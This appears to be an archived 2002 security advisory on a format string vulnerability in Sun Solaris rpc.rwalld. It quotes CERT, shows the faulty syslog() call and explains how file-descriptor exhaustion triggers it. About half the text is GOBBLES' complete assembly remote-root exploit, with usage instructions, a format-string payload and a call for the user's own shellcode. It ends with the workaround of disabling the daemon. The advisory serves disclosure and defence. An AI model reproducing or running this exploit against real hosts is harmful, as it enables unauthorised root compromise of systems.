TUCoPS :: SunOS/Solaris :: sun5319.htm

rpc.rwalld Format String Vulnerability
2nd May 2002 [SBWID-5319]
COMMAND

	Sun rpc.rwalld format string vulnerability

SYSTEMS AFFECTED

	Sun Solaris 2.5.1, 2.6, 7, and 8

PROBLEM

	In CERT [http://www.cert.org/] advisory [CA-2002-10] :
	

	-snapp-
	

	 rpc.rwalld is a utility that listens for remote wall requests. Wall is

	 used  to  send a message to all terminals of a time-sharing system. If

	 the  wall command cannot be executed, the rwall daemon will display an

	 error message.

	

	 An  intruder can consume system resources and potentially prevent wall

	 from  executing, which would trigger the rwall daemon\'s error message.

	 A  format  string  vulnerability  exists in the code that displays the

	 error  message.  This vulnerability may permit the intruder to execute

	 code with the privileges of the rwall daemon.

	

	 This  vulnerability  may  be  exploited  both  locally  and  remotely,

	 although remote exploitation is significantly more difficult.

	

	-snipp-
	

	In GOBBLES security advisory [#32]  who  originally  reported  the  bug,
	they added the following comments to the faulty code :
	

	   /*

	    * Make sure the wall programs exists, is executeable, and runs

	    */

	   if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||

	      (fp = popen(WALL_PROG, \"w\")) == NULL) {

	          syslog(LOG_NOTICE,

	                   \"rwall message received but could not execute %s\",

	                   WALL_PROG);

	          syslog(LOG_NOTICE, msg);

	

	Bug easy enough to spot, but now question is, \"GOBBLES, friend, how  is
	this to be exploited? Faulty syslog() only called if rpc.rwalld can  not
	execute /usr/sbin/wall on local system, which mean it  only  exploitable
	if admin have chmod -x or rm  /usr/sbin/wall  or  something  like  this,
	right, so why this so such a big deal?\"
	

	To this GOBBLES say,  \"Friend  IDIOT,  faulty  syslog()  is  called  if
	anything is to make popen() fail, there one other way  to  exploit  bug,
	which make it dangerous and affect all installation of  Solaris  running
	rpc.rwalld,  is  that  popen()  to  fail  if  there  no  available  file
	descriptors on system.\"
	

	This easier to exploit  locally  on  system.  For  remote  exploitation,
	timing is important and thus is race condition. Each new tcp session  to
	running service on target host will consume filedescriptor.
	

	And the \"not so exploitable\" exploit :
	

	/*

	   Remote Root Exploit for Solaris 6-8 rpc.walld

	

	      Usage Instructions:

	       1. Compile.

	           gcc -o xwall xwall.s

	       2. Run.

	          (./xwall ; ./shellcode) | rwall victim

		3. Late Easter egg.

		  strings xwall

	

	      Note(s):

	       Something else must be done to consume FD\'s on

	       victim system.  Figure this one out for self.

	

	       This exploit written to be run on Linux.  Supplied

	       format string is for Sparc Solaris.  Provide own

	       remote shellcode and use as above described.

	

	   Love,

	   GOBBLES Security

	   http://www.bugtraq.org

	   GOBBLES@hushmail.com

	*/

	

	

	retloc:

	.long 0x41424344

	retaddr:

	.long 0x60bb135

	padding:

	.long 4

	walkcount:

	.long 1

	.globl main

	.type main,@function

	main:

	pusha

	movl (padding),%ecx

	jusfhds7fg:

	pushl %ecx

	movl $4,%eax

	movl $1,%ebx

	pushl $0x00000041

	movl %esp,%ecx

	movl $1,%edx

	int $0x80

	popl %ecx

	popl %ecx

	loop jusfhds7fg

	movl %esp,24(%esp)

	pushl $0x42424242

	movl $4,%edx

	movl %esp,%ecx

	movl $1,%ebx

	movl $4,%eax

	int $0x80

	movl (retloc),%eax

	bswapl %eax

	pushl %eax

	subl $4,%ecx

	movl %edx,%eax

	int $0x80

	addl $4,%ecx

	movl %edx,%eax

	int $0x80

	subl $4,%ecx

	popl %eax

	bswapl %eax

	incl %eax

	incl %eax

	bswapl %eax

	pushl %eax

	movl %edx,%eax

	int $0x80

	popl %eax

	movl %esp,%edx

	incl %edx

	xorl %esi,101(%ebp)

	andb %al,111(%edx)

	popa

	pushl %edx

	andb %al,97(%ebx)

	decl %esi

	aaa

	andb %al,111(%ebx)

	incl %esp

	xorl (%ecx),%eax

	movl (walkcount),%ecx

	cmpl $0,%ecx

	je nczxhczjcg89zg89

	pushl %ecx

	movl $4,%edx

	movl $1,%ebx

	pushl $0x78382e25

	cmzxnczxcz8c:

	pushl %ecx

	movl %esp,%ecx

	addl $4,%ecx

	movl $4,%eax

	int $0x80

	popl %ecx

	loop cmzxnczxcz8c

	popl %ecx

	popl %ecx

	nczxhczjcg89zg89:

	movl (retaddr),%edx

	pushl %edx

	shr $16,%edx

	subl %edx,(%esp)

	movw $0,2(%esp)

	pushl %edx

	shll $3,%ecx

	subl %ecx,(%esp)

	movl (padding),%edx

	subl %edx,(%esp)

	subl $16,(%esp)

	movw $0,2(%esp)

	pushl $cznxczxczxh8

	call printf

	movl $1,%eax

	int $0x80

	cznxczxczxh8:

	.string \"%%%uc%%hn%%%uc%%hn\\n\"

	

	

SOLUTION

	Disabling rpc.rwalld in inetd.conf is the recommended  workaround  until
	patches are available.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH